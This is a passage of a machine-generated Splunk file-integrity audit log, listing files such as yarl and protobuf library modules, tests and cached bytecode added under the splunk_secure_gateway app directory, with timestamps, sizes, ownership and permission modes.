action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/_quoting_c.pyx", isdir=0, size=11498, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.439, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/_quoting_c.pyi", isdir=0, size=447, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.435, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/_quoting_c.cpython-37m-x86_64-linux-gnu.so", isdir=0, size=678152, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.430, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/_quoting_c.c", isdir=0, size=453267, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.426, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/_quoting.py", isdir=0, size=519, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.422, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:33.417, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/__init__.pyi", isdir=0, size=3702, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.413, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl/__init__.py", isdir=0, size=154, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.308, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/__pycache__/__init__.cpython-37.pyc", isdir=0, size=152, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.202, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/compiler/plugin_pb2.py", isdir=0, size=10823, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.198, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/compiler/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.194, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__/wire_format.cpython-37.pyc", isdir=0, size=6372, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.190, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__/well_known_types.cpython-37.pyc", isdir=0, size=26148, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.186, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__/type_checkers.cpython-37.pyc", isdir=0, size=9108, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.180, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__/python_message.cpython-37.pyc", isdir=0, size=42453, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.176, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__/message_listener.cpython-37.pyc", isdir=0, size=2342, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.172, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__/enum_type_wrapper.cpython-37.pyc", isdir=0, size=2773, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.168, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__/encoder.cpython-37.pyc", isdir=0, size=24214, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.163, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__/decoder.cpython-37.pyc", isdir=0, size=21038, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.158, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__/containers.cpython-37.pyc", isdir=0, size=20352, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.154, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__/api_implementation.cpython-37.pyc", isdir=0, size=2547, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.150, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__/__init__.cpython-37.pyc", isdir=0, size=170, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:33.046, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/import_test_package/outer_pb2.py", isdir=0, size=2694, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.042, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/import_test_package/inner_pb2.py", isdir=0, size=2204, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.038, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/import_test_package/__init__.py", isdir=0, size=1768, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.033, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/wire_format_test.py", isdir=0, size=10930, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.028, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/wire_format.py", isdir=0, size=8444, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.024, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/well_known_types_test.py", isdir=0, size=36016, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.019, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/well_known_types.py", isdir=0, size=28460, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.016, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/unknown_fields_test.py", isdir=0, size=13868, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.011, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/type_checkers.py", isdir=0, size=14226, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.006, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/text_format_test.py", isdir=0, size=68043, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:33.001, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/text_encoding_test.py", isdir=0, size=2903, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.997, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/testing_refleaks.py", isdir=0, size=4508, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.994, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/test_util.py", isdir=0, size=33922, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.989, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/test_bad_identifiers_pb2.py", isdir=0, size=5917, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.985, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/symbol_database_test.py", isdir=0, size=5650, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.981, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/service_reflection_test.py", isdir=0, size=5412, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.977, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/reflection_test.py", isdir=0, size=128270, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.974, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/python_message.py", isdir=0, size=57876, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.967, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/proto_builder_test.py", isdir=0, size=3770, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.963, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/packed_field_test_pb2.py", isdir=0, size=17924, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.959, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/no_package_pb2.py", isdir=0, size=3026, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.954, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/more_messages_pb2.py", isdir=0, size=4312, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.950, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/more_extensions_pb2.py", isdir=0, size=7386, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.945, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/more_extensions_dynamic_pb2.py", isdir=0, size=5005, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.940, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/missing_enum_values_pb2.py", isdir=0, size=9356, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.936, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/message_test.py", isdir=0, size=88427, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.930, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/message_set_extensions_pb2.py", isdir=0, size=8404, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.924, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/message_listener.py", isdir=0, size=3367, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.919, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/message_factory_test.py", isdir=0, size=9670, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.916, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/json_format_test.py", isdir=0, size=42030, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.910, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/import_test_package", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:32.906, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/generator_test.py", isdir=0, size=14779, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.902, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/file_options_test_pb2.py", isdir=0, size=3072, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.896, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/factory_test2_pb2.py", isdir=0, size=25201, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.893, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/factory_test1_pb2.py", isdir=0, size=7954, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.888, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/enum_type_wrapper.py", isdir=0, size=3554, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.884, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/encoder.py", isdir=0, size=28587, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.880, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/descriptor_test.py", isdir=0, size=43095, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.877, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/descriptor_pool_test2_pb2.py", isdir=0, size=12614, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.873, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/descriptor_pool_test1_pb2.py", isdir=0, size=21326, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.869, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/descriptor_pool_test.py", isdir=0, size=46062, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.865, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/descriptor_database_test.py", isdir=0, size=5511, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.861, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/decoder.py", isdir=0, size=31289, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.855, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/containers.py", isdir=0, size=21000, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.851, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/api_implementation.py", isdir=0, size=7237, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.844, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/any_test_pb2.py", isdir=0, size=7055, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.839, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/_parameterized.py", isdir=0, size=15360, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.835, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/_api_implementation.cpython-37m-x86_64-linux-gnu.so", isdir=0, size=5408, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.830, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:32.825, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/internal/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.420, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/pyext/python_pb2.py", isdir=0, size=9753, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.415, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/pyext/cpp_message.py", isdir=0, size=2851, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.411, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/pyext/_message.cpython-37m-x86_64-linux-gnu.so", isdir=0, size=2253656, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.407, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/pyext/__init__.py", isdir=0, size=150, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.303, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/util/json_format_proto3_pb2.py", isdir=0, size=81998, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.299, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/util/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.295, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/wrappers_pb2.cpython-37.pyc", isdir=0, size=4659, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.291, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/text_format.cpython-37.pyc", isdir=0, size=39876, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.287, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/text_encoding.cpython-37.pyc", isdir=0, size=3179, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.282, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/symbol_database.cpython-37.pyc", isdir=0, size=5492, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.279, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/reflection.cpython-37.pyc", isdir=0, size=2765, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.274, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/message_factory.cpython-37.pyc", isdir=0, size=4076, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.270, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/message.cpython-37.pyc", isdir=0, size=10776, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.266, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/descriptor_pool.cpython-37.pyc", isdir=0, size=28424, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.262, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/descriptor_pb2.cpython-37.pyc", isdir=0, size=31382, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.256, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/descriptor_database.cpython-37.pyc", isdir=0, size=4468, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.253, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/descriptor.cpython-37.pyc", isdir=0, size=33185, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.249, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/any_pb2.cpython-37.pyc", isdir=0, size=2108, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.246, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/__pycache__/__init__.cpython-37.pyc", isdir=0, size=367, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:32.141, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/wrappers_pb2.py", isdir=0, size=11626, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.137, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/util", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:32.133, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/unittest_proto3_arena_pb2.py", isdir=0, size=54739, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.130, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/unittest_pb2.py", isdir=0, size=352539, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.126, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/unittest_no_generic_services_pb2.py", isdir=0, size=4306, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.122, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/unittest_no_arena_pb2.py", isdir=0, size=51593, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.118, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/unittest_no_arena_import_pb2.py", isdir=0, size=2239, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.114, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/unittest_mset_wire_format_pb2.py", isdir=0, size=3619, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.110, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/unittest_mset_pb2.py", isdir=0, size=9999, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.105, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/unittest_import_public_pb2.py", isdir=0, size=2261, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.100, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/unittest_import_pb2.py", isdir=0, size=4608, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:32.096, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google/protobuf/unittest_custom_options_pb2.py", isdir=0, 